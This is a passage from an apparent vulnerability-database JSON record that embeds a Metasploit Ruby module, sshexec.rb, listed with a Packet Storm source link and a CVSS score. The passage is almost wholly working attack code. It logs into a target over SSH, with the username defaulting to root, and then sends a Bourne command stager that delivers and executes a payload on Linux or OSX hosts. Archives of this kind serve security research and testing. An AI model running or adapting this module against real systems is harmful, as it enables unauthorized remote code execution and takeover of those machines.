\n'BadChars' => \"\", \n'DisableNops' => true \n}, \n'Platform' => [ 'osx', 'linux' ], \n'Targets' => \n[ \n[ 'Linux x86', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n}, \n], \n[ 'Linux x64', \n{ \n'Arch' => ARCH_X86_64, \n'Platform' => 'linux' \n}, \n], \n[ 'OSX x86', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'osx' \n}, \n], \n], \n'DefaultTarget' => 0, \n# For the CVE \n'DisclosureDate' => 'Jan 01 1999' \n) \n \nregister_options( \n[ \nOptString.new('USERNAME', [ true, \"The user to authenticate as.\", 'root' ]), \nOptString.new('PASSWORD', [ true, \"The password to authenticate with.\", '' ]), \nOptString.new('RHOST', [ true, \"The target address\" ]), \nOpt::RPORT(22) \n], self.class \n) \n \nregister_advanced_options( \n[ \nOptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]) \n] \n) \nend \n \ndef execute_command(cmd, opts = {}) \nbegin \nTimeout.timeout(3) do \nself.ssh_socket.exec!(\"#{cmd}\\n\") \nend \nrescue ::Exception \nend \nend \n \ndef do_login(ip, user, pass, port) \nopt_hash = { \n:auth_methods => ['password', 'keyboard-interactive'], \n:msframework => framework, \n:msfmodule => self, \n:port => port, \n:disable_agent => true, \n:password => pass \n} \n \nopt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] \n \nbegin \nself.ssh_socket = Net::SSH.start(ip, user, opt_hash) \nrescue Rex::ConnectionError, Rex::AddressInUse \nfail_with(Exploit::Failure::Unreachable, 'Disconnected during negotiation') \nrescue Net::SSH::Disconnect, ::EOFError \nfail_with(Exploit::Failure::Disconnected, 'Timed out during negotiation') \nrescue Net::SSH::AuthenticationFailed \nfail_with(Exploit::Failure::NoAccess, 'Failed authentication') \nrescue Net::SSH::Exception => e \nfail_with(Exploit::Failure::Unknown, \"SSH Error: #{e.class} : #{e.message}\") \nend \n \nif not self.ssh_socket \nfail_with(Exploit::Failure::Unknown) \nend \nreturn \nend \n \ndef exploit \ndo_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT']) \n \nprint_status(\"#{datastore['RHOST']}:#{datastore['RPORT']} - Sending Bourne stager...\") \nexecute_cmdstager({:linemax => 500}) \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/121655/sshexec.rb.txt"}]}